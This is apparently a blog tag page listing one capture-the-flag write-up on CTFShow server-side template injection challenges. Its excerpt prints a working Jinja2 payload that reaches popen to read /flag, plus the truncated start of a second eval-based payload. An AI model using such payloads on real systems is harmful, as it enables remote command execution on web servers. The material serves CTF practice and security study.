标签: SSTI

1 篇文章

thumbnail
【原创】CTFShow—SSTI
[huayang] web361 ?name={{().__class__.__bases__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} web362 {{x.__init__.__globals__['__builtins__'].eval('__im…